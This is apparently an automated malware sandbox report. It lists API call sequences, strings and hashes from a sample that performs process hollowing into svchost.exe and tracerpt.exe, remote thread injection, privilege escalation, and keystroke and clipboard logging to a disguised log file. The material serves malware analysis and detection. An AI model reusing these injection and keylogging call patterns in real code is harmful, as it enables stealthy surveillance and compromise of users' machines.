                                          • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 03D99814
                                          • CloseHandle.KERNEL32(00000000), ref: 03D9981B
                                          • ReleaseMutex.KERNEL32(?), ref: 03D99828
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock_memmove
                                          • String ID: [$%s%s$%s%s$%s%s$[esc]
                                          • API String ID: 3314438383-2373594894
                                          • Opcode ID: 05d1e500b508bafe074cc5764428aa9faf5376ca7f8820f6f1b23278ab04a3dc
                                          • Instruction ID: fdf5c565ecdb66a0cfd45d20453373e3719184c2f6d6f143e79b42ed2796379c
                                          • Opcode Fuzzy Hash: 05d1e500b508bafe074cc5764428aa9faf5376ca7f8820f6f1b23278ab04a3dc
                                          • Instruction Fuzzy Hash: 71C1C276510301EFEB20EF64DC99B9A77B8FB08B00F048A5DE15A96394EB749584CF61
                                          APIs
                                          • _memset.LIBCMT ref: 03D88D04
                                          • _memset.LIBCMT ref: 03D88D50
                                          • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03D88D64
                                            • Part of subcall function 03D8B270: _vswprintf_s.LIBCMT ref: 03D8B281
                                          • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88D93
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 03D88DDA
                                            • Part of subcall function 03D88C40: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03D88DFC), ref: 03D88C56
                                            • Part of subcall function 03D88C40: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03D88DFC,?,?,?,?,?,?,74DF0630), ref: 03D88C5D
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E0A
                                          • _memset.LIBCMT ref: 03D88E23
                                          • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E3B
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88E44
                                          • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E56
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88E59
                                          • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E6B
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88E6E
                                          • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E80
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88E83
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E8B
                                          • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03D88E92
                                          • _memset.LIBCMT ref: 03D88EB4
                                          • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88ECA
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 03D88EFF
                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03D88F1B
                                          • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03D88F43
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03D88F58
                                          • WriteProcessMemory.KERNEL32(00000000,00000000,03D88BF0,00001000,00000000), ref: 03D88F72
                                          • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03D88F90
                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03D88FA1
                                          • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88FBA
                                          • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03D88FD6
                                          • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03D88FE8
                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03D88FF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                          • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                          • API String ID: 4176418925-3213446972
                                          • Opcode ID: 7e856e1ddbe19c0daf374460f79b19c56dd075b168b433bf3bb4498d4a1f9475
                                          • Instruction ID: 7853e2d02c8120685f5dfafac8677071f367595c218e05111daf708b6a056d79
                                          • Opcode Fuzzy Hash: 7e856e1ddbe19c0daf374460f79b19c56dd075b168b433bf3bb4498d4a1f9475
                                          • Instruction Fuzzy Hash: 7D81CA72A40318FBE721EB65DC45FDF777CDF95B00F000499F249A6181EAB4AB858B64
                                          APIs
                                            • Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19
                                          • _sprintf.LIBCMT ref: 6C363A79
                                            • Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
                                            • Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
                                            • Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
                                            • Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
                                            • Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
                                            • Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
                                            • Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF
                                          • _sprintf.LIBCMT ref: 6C363AB3
                                          • _sprintf.LIBCMT ref: 6C363B0F
                                          • _sprintf.LIBCMT ref: 6C363B6C
                                          • _sprintf.LIBCMT ref: 6C363BEE
                                            • Part of subcall function 6C3714FC: _fprintf.LIBCMT ref: 6C3715E2
                                            • Part of subcall function 6C3714FC: SetWindowExtEx.GDI32(00000000,00000000,00000000), ref: 6C3716FC
                                            • Part of subcall function 6C3714FC: SetBkMode.GDI32(00000001), ref: 6C37170A
                                            • Part of subcall function 6C3714FC: SelectObject.GDI32(?,00000000), ref: 6C37171C
                                            • Part of subcall function 6C371AD3: _sprintf.LIBCMT ref: 6C371B63
                                          • _sprintf.LIBCMT ref: 6C363CB6
                                          • _sprintf.LIBCMT ref: 6C363C4B
                                            • Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF
                                            • Part of subcall function 6C3714FC: _fputc.LIBCMT ref: 6C37163A
                                          • _sprintf.LIBCMT ref: 6C363CF9
                                          • _sprintf.LIBCMT ref: 6C363DC6
                                          • _sprintf.LIBCMT ref: 6C363E66
                                            • Part of subcall function 6C3D1F84: __flsbuf.LIBCMT ref: 6C3D1FFA
                                          • _sprintf.LIBCMT ref: 6C363ED4
                                          Strings
                                          • %s, xrefs: 6C363BE2
                                          • H;GlY, xrefs: 6C363A46
                                          • %2d, xrefs: 6C363AAD
                                          • %4d%s %s, xrefs: 6C363C45
                                          • Total RSHXY RSHXY%7.1f 100.0%%, xrefs: 6C363CF3
                                          • %d:%7d%7.1f (%d) /%5.1f%% %c%6.2f%7.1f (%d) /%5.1f%%, xrefs: 6C363E60
                                          • Ray Count Power Rank Perc. %c Slice Power Rank Perc., xrefs: 6C363DC0
                                          • Body Location Rulers House Rulers Power Rank Percent, xrefs: 6C363A32
                                          • %.3s , xrefs: 6C363B09
                                          • %6.1f (%2d) /%5.1f%%, xrefs: 6C363CB0
                                          • Tot:%5d%7.1f 100.0%% %c%6.2f%7.1f 100.0%%, xrefs: 6C363ECE
                                          • %-4.4s, xrefs: 6C363A73
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$CapsDeviceModePageTextViewportWindow$ColorObjectSelectStart__flsbuf__output_l_fprintf_fputc
                                          • String ID: %s$%-4.4s$%.3s $%2d$%4d%s %s$%6.1f (%2d) /%5.1f%%$%d:%7d%7.1f (%d) /%5.1f%% %c%6.2f%7.1f (%d) /%5.1f%%$Body Location Rulers House Rulers Power Rank Percent$H;GlY$Ray Count Power Rank Perc. %c Slice Power Rank Perc.$Tot:%5d%7.1f 100.0%% %c%6.2f%7.1f 100.0%%$Total RSHXY RSHXY%7.1f 100.0%%
                                          • API String ID: 3459736133-1418402959
                                          • Opcode ID: a7cf4b44a5870a46478de8e6478524564ea00870b6031426c12d0be79fec43b6
                                          • Instruction ID: 7cba86010c149cc5dba98791e2680cb15b9ea4cce94458321441f129feaff250
                                          • Opcode Fuzzy Hash: a7cf4b44a5870a46478de8e6478524564ea00870b6031426c12d0be79fec43b6
                                          • Instruction Fuzzy Hash: A20233B2A001588BDB20EFA4DC45FEDB774EF45308F0104E9D089A7A95DB358DA8CF56
                                          APIs
                                          • _memset.LIBCMT ref: 02F05839
                                          • _memset.LIBCMT ref: 02F05858
                                          • _memset.LIBCMT ref: 02F0588D
                                          • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02F058A1
                                            • Part of subcall function 02F059D0: _vswprintf_s.LIBCMT ref: 02F059E1
                                          • GetFileAttributesA.KERNEL32(?), ref: 02F058D0
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02F05918
                                          • VirtualAllocEx.KERNEL32(?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F0593E
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05958
                                          • GetThreadContext.KERNEL32(?,?,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05977
                                          • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F05992
                                          • ResumeThread.KERNEL32(?,?,00000000,?,00043FBF,00000000,?,00000000,00043FBF,00003000,00000040,74DF0630), ref: 02F059B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                          • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                          • API String ID: 2170139861-1986163084
                                          • Opcode ID: 928655b267625d0ed1cba4c55e5f69b4b31f5c703bd51970efa403795fbb3cef
                                          • Instruction ID: 4dd44e3034c801d10e50041d274e7ba4cdbffd33a5d5f519b42f9ef0bf04b780
                                          • Opcode Fuzzy Hash: 928655b267625d0ed1cba4c55e5f69b4b31f5c703bd51970efa403795fbb3cef
                                          • Instruction Fuzzy Hash: BA41B7B0E40309ABE720DF70DC95FAAB7B8AF44B44F90459DB64DA71C0DBB09A808F54
                                          APIs
                                          • _memset.LIBCMT ref: 03D89373
                                          • _memset.LIBCMT ref: 03D8939F
                                          • _memset.LIBCMT ref: 03D893D4
                                          • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03D893E8
                                            • Part of subcall function 03D8B270: _vswprintf_s.LIBCMT ref: 03D8B281
                                          • GetFileAttributesA.KERNEL32(?), ref: 03D89415
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03D89465
                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03D89492
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03D894AA
                                          • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03D894CC
                                          • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03D894EA
                                          • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03D894FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                          • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                          • API String ID: 2170139861-2473635271
                                          • Opcode ID: 00c7e8a34df49c0372c2b3247e06a83271ac3de0bf50651430578e41cea224d5
                                          • Instruction ID: 23ef30bb443cc7e794f4bfaaf73ffa9055f02270efae20a4ea0ca466b1534cfc
                                          • Opcode Fuzzy Hash: 00c7e8a34df49c0372c2b3247e06a83271ac3de0bf50651430578e41cea224d5
                                          • Instruction Fuzzy Hash: FE4187B6A00218EBDB21EB64DC95FEE77BCDB44B00F0045D9E64DA61C0E6B0AB85CF54
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03DC31A0,74DEE010,74DF2FA0,74DF0F00,?,03D86858,?,?), ref: 03D990B9
                                          • lstrcatW.KERNEL32(03DC31A0,\DisplaySessionContainers.log,?,03D86858,?,?), ref: 03D990C9
                                          • CreateMutexW.KERNEL32(00000000,00000000,03DC31A0,?,03D86858,?,?), ref: 03D990D8
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03D86858,?,?), ref: 03D990E6
                                          • CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000080,00000000,?,03D86858,?,?), ref: 03D99103
                                          • GetFileSize.KERNEL32(00000000,00000000,?,03D86858,?,?), ref: 03D9910E
                                          • CloseHandle.KERNEL32(00000000,?,03D86858,?,?), ref: 03D99117
                                          • DeleteFileW.KERNEL32(03DC31A0,?,03D86858,?,?), ref: 03D9912A
                                          • ReleaseMutex.KERNEL32(?,?,03D86858,?,?), ref: 03D99137
                                          • DirectInput8Create.DINPUT8(?,00000800,03DB5274,03DC3640,00000000,?,03D86858,?,?), ref: 03D99152
                                          • GetTickCount.KERNEL32 ref: 03D99205
                                          • GetKeyState.USER32(00000014), ref: 03D99212
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                          • String ID: <$\DisplaySessionContainers.log
                                          • API String ID: 1095970075-1170057892
                                          • Opcode ID: 9bfdd95d4c5be35dbaaa3260b58412526f7c65bdeeaa8da35e2911f38483ad83
                                          • Instruction ID: 6c394ecd7a2ff6b591e0333561a949c92f54253f0821cf915fd56c9f58813fe7
                                          • Opcode Fuzzy Hash: 9bfdd95d4c5be35dbaaa3260b58412526f7c65bdeeaa8da35e2911f38483ad83
                                          • Instruction Fuzzy Hash: 2541A076B50306EFEB00EFA4DC99F9A77A8AB48B00F108409F605AB384D775E506CB90
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000020,?,74DF2EE0,?,?,?,?,?,?,03D98B3E), ref: 03D88B37
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,03D98B3E), ref: 03D88B3E
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03D88B5A
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D88B77
                                          • CloseHandle.KERNEL32(?), ref: 03D88B81
                                          • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,03D98B3E), ref: 03D88B91
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88B98
                                          • GetCurrentProcessId.KERNEL32 ref: 03D88BBA
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 03D88BC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                          • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                          • API String ID: 1802016953-1577477132
                                          • Opcode ID: 5d430b1287980dd0e437b1ab8b81585f1dad1bb5f5d9f09d5f424d6491f7516f
                                          • Instruction ID: 40633f9e74ae0064d05ce6edbbbadeb65c2e1c5ce399c425db789c3bbd280b94
                                          • Opcode Fuzzy Hash: 5d430b1287980dd0e437b1ab8b81585f1dad1bb5f5d9f09d5f424d6491f7516f
                                          • Instruction Fuzzy Hash: AD213673A40309EFEB10EFE4DC4AFBE7778DB48B01F400549B615AA284DAB49545CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Create$CloseValue$_sprintf$FileModuleName
                                          • String ID: %s%sF%d$Alt+$Ctrl+$Shift+
                                          • API String ID: 2934808895-1571627948
                                          • Opcode ID: f121afe4aeaf252b1c74ff411acb91a4ad7cd5d76c6699541ac0189e66e7e16c
                                          • Instruction ID: 8ffb3cebd31f2d70dc01ca16771c96b1ff464e47c92d3bc3f50770d06caa488b
                                          • Opcode Fuzzy Hash: f121afe4aeaf252b1c74ff411acb91a4ad7cd5d76c6699541ac0189e66e7e16c
                                          • Instruction Fuzzy Hash: F6C116317042059BDB14EFB9CC92FAA77F9EB4635CF14452AE451CBA80D725D822CFA1
                                          APIs
                                            • Part of subcall function 6C39D06F: _fseek.LIBCMT ref: 6C39D0BD
                                            • Part of subcall function 6C39D06F: __fread_nolock.LIBCMT ref: 6C39D0EA
                                            • Part of subcall function 6C39D06F: _sprintf.LIBCMT ref: 6C39D152
                                          • _fseek.LIBCMT ref: 6C39BEB4
                                          • _malloc.LIBCMT ref: 6C39BECC
                                            • Part of subcall function 6C3D37D0: __FF_MSGBANNER.LIBCMT ref: 6C3D37E9
                                            • Part of subcall function 6C3D37D0: __NMSG_WRITE.LIBCMT ref: 6C3D37F0
                                            • Part of subcall function 6C3D37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3D7A8B,?,00000001,?,?,6C3D7F4A,00000018,6C442E78,0000000C,6C3D7FDA), ref: 6C3D3815
                                          • _memset.LIBCMT ref: 6C39BEE7
                                          • _sprintf.LIBCMT ref: 6C39C453
                                          • _sprintf.LIBCMT ref: 6C39C49F
                                          • _free.LIBCMT ref: 6C39C4AD
                                          Strings
                                          • error in ephemeris file: %d coefficients instead of %d. , xrefs: 6C39C448
                                          • error in ephemeris file %s: %d coefficients instead of %d. , xrefs: 6C39C494
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$_fseek$AllocateHeap__fread_nolock_free_malloc_memset
                                          • String ID: error in ephemeris file %s: %d coefficients instead of %d. $error in ephemeris file: %d coefficients instead of %d.
                                          • API String ID: 5245458-905328425
                                          • Opcode ID: 66dc2f525807ba01f5366b9b7d9f0e819ce9ef2ca8292e89655409d6e84b58b0
                                          • Instruction ID: a803f49e3636383c99b1bb533a9ed0a3f22198b6b0f836549389cacbc4097d44
                                          • Opcode Fuzzy Hash: 66dc2f525807ba01f5366b9b7d9f0e819ce9ef2ca8292e89655409d6e84b58b0
                                          • Instruction Fuzzy Hash: 0812FF71E0061ADBEB25DF15DC40BE9B7B2FB84314F1186EAD54EB2690EB319A90CF10
                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03D9BC73
                                          • GetSystemInfo.KERNEL32(?), ref: 03D9BC8B
                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03D9BC9B
                                          • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 03D9BCAB
                                          • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03D9BCFD
                                          • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03D9BD12
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                          • String ID: SetThreadStackGuarantee$kernel32.dll
                                          • API String ID: 3290314748-423161677
                                          • Opcode ID: 0f465235797a8a047ade74d17296fe4cf93befaa8277561b4e95f0e27097dc0c
                                          • Instruction ID: 8c80ab040e0a81d3bb95bc0059af403136f504ee46d36628a43b1e31eb7b73fd
                                          • Opcode Fuzzy Hash: 0f465235797a8a047ade74d17296fe4cf93befaa8277561b4e95f0e27097dc0c
                                          • Instruction Fuzzy Hash: 54318472E0021DEFEF10DBE4EC84AEEB7B8EF44B51B154517E506E6140EB70AA04CB94
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
                                          • GetLastError.KERNEL32 ref: 03D890D2
                                          • CloseHandle.KERNEL32(?), ref: 03D890E0
                                          • CloseHandle.KERNEL32(?), ref: 03D890FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
